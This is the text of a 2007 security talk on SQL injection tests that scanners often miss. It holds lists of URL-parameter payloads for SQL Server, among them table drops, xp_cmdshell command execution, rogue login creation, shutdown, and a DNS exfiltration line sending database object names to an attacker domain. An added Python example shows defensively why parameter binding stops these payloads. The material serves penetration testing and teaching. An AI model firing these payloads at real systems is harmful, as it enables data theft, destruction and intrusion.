Overlooked SQL Injection 20071021

This document summarizes overlooked SQL injection techniques in three categories: integers, strings, and attacks. For each category, it lists common tests, overlooked tests that are not usually checked for, and alphanumeric tests involving non-numeric characters. It provides examples for each type of test and overlooked resources for learning about SQL injection. The document aims to bring attention to tests that are often overlooked but still pose security risks.

Uploaded by

Victor Bishop
Copyright
© Attribution Non-Commercial (BY-NC)

Overlooked SQL Injection

A short summary of techniques that are often overlooked
Paul Battista

Comic Relief

Source: http://xkcd.com/327/

Outline
Integers and other non-string values
    Common Tests, Overlooked Tests, Alphanumeric Tests

Strings
    Common Tests, Overlooked Tests, Alphanumeric Tests

Attack Examples
    Common Attacks, Overlooked Attacks, Alphanumeric Attacks

Common Tests on INTs

?errorcode=2
?errorcode=2
?errorcode=2 or 1=1
?errorcode=2 and 1=1
?errorcode=2 and 1=2
?errorcode=2;-
?errorcode=2;--GARBAGE DATA
?errorcode=2; waitfor DELAY 00:00:20

Overlooked Tests on INTs

?errorcode=(2)
?errorcode=1+1
?errorcode=(1+1)
?errorcode=2
?errorcode=%
?errorcode=[0123]

Alphanumeric Tests on INTs

?errorcode=2 RETURN
?errorcode=2 RETRUN
?errorcode=2 SELECT user
?errorcode=2 BEGIN SELECT user END
?errorcode=2 or 1 like 1
?errorcode=2 and 1 like 1
?errorcode=2 and 1 like 2

Common Tests on Strings

?errormsg=error
?errormsg=error
?errormsg=error-
?errormsg=error and 2=2
?errormsg=error and 2=2-
?errormsg=error waitfor DELAY 00:00:20

Overlooked Tests on Strings

?errormsg=erro+r
?errormsg=error+space(1)+message
?errormsg=err+substring(error,4,1)+r
?errormsg=%
?errormsg=erro%
?errormsg=erro[a-z]
?errormsg=erro[abc]

Alphanumeric Tests on Strings

?errormsg=AAAAAA (7807 characters)

Common Attacks

?errorcode=2; DROP TABLE tablename
?errorcode=2 UNION SELECT
?errorcode=2; if (SELECT user)=dbo waitfor DELAY 00:00:20
?errorcode=2 and (substring(apple,1,1))=(a)
Username: or 2=2  Password: or 2=2
Username: admin--

Overlooked Attacks

?errorcode=(SELECT TOP 1 name FROM sysobjects WHERE xtype=u)
?errorcode=2 exec master.dbo.xp_cmdshell vncserver (does not require semicolon or quotes if single command)
?errorcode=2 INSERT INTO OPENROWSET()
?errorcode=22; exec(N' declare @s varchar(200); select @s=''\\''+name+''-''+''.AttackersDomain.com\file'' from sysobjects; exec master.dbo.xp_dirtree @s')

Alphanumeric Attacks

?errorcode=2 UNION SELECT name FROM sysobjects
?errorcode=2 CREATE LOGIN attacker
?errorcode=2 CREATE DATABASE attackersDatabase
?errorcode=2 SELECT name INTO attackerstable FROM sysobjects
?errorcode=2 ALTER TABLE errormessages ADD attackerscolumn INT
?errorcode=2 DROP TABLE tablename
?errorcode=2 shutdown
?errorcode=2 HAVING 1 LIKE 1 (discloses a column name)
?errorcode=2 order by 4 (helps to disclose the number of columns)
?errorcode=2 USE databasename
?errorcode=2 SELECT null from creditcards
?errorcode=2 SELECT null from nonexistenttable
?errorcode=2 select cardnumber from creditcards
?errorcode=2 select nonexistentcolumn from creditcards
?errorcode=2 or errorcode like 1
?errorcode=2 or nonexistentcolumn like 1
?errorcode=2 or errorcode between 0 and 99999999
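The integer test slides and the alphanumeric attack slide share one lesson for defenders: a filter that only hunts for quotes, semicolons and comment markers lets the parenthesised, arithmetic, wildcard and quote-free forms straight through, while a strict type check plus parameter binding stops every one of them. The following Python example demonstrates that gap; it is added here and is not code from the slides, and the errormessages table contents, column names and sample inputs are constructed for illustration.

```python
import re
import sqlite3

# Constructed sample values for the ?errorcode= parameter, drawn from the test lists above.
SAMPLE_INPUTS = [
    "2", "2 or 1=1", "2; waitfor DELAY 00:00:20",          # "common" forms
    "(2)", "1+1", "%", "[0123]",                            # "overlooked" forms
    "2 or 1 like 1", "2 HAVING 1 LIKE 1", "2 shutdown",     # "alphanumeric" forms
]


def naive_denylist_ok(value: str) -> bool:
    """A quote/semicolon/comment/equals denylist of the kind that only catches the
    'common' tests. Returns True when the value would be let through."""
    return not re.search(r"['\";]|--|=", value)


def strict_int(value: str):
    """Positive validation: accept only a canonical decimal integer, otherwise None.
    Parentheses, arithmetic, wildcards, brackets and trailing keywords all fail here."""
    return int(value) if re.fullmatch(r"-?\d{1,9}", value) else None


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the errormessages table named on the slides."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE errormessages(errorcode INTEGER PRIMARY KEY, msg TEXT)")
    conn.executemany("INSERT INTO errormessages VALUES (?, ?)",
                     [(1, "ok"), (2, "error"), (3, "fatal")])
    return conn


def lookup_error(conn: sqlite3.Connection, raw: str):
    """Validate, then bind: the driver sends the int as a parameter, so nothing from the
    request is ever spliced into the SQL text. Returns the message or None on rejection."""
    code = strict_int(raw)
    if code is None:
        return None  # rejected input: this is the place to log the raw value for detection
    row = conn.execute("SELECT msg FROM errormessages WHERE errorcode = ?", (code,)).fetchone()
    return row[0] if row else None


def slipped_past_denylist() -> list:
    """Inputs the denylist accepts but strict validation rejects: the overlooked cases."""
    return [v for v in SAMPLE_INPUTS if naive_denylist_ok(v) and strict_int(v) is None]
```

Running slipped_past_denylist() lists every overlooked and alphanumeric form from the slides, which is exactly the set a character-based filter misses and a typed, parameterized lookup refuses.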

Common Resources

http://www.ngssoftware.com/research/papers/sqlinference.pdf
http://www.0x000000.com/?i=14&bin=1110
http://ferruh.mavituna.com/makale/sqlinjection-cheatsheet/
http://ha.ckers.org/sqlinjection/
http://www.spidynamics.com/assets/documents/Blind_SQLInjection.pdf

Overlooked Resources

SQLzoo.net
msdn2.microsoft.com
Hackme.mightyseek.com
http://www.inspectit.se/dc15.html

AlphaNumeric Resources
Just Kidding

Questions & Contact Info

Paul Battista
SecurityExperiment.com
Paul@SecurityExperiment.com

Sometimes people just have bad ideas; we like to find them.
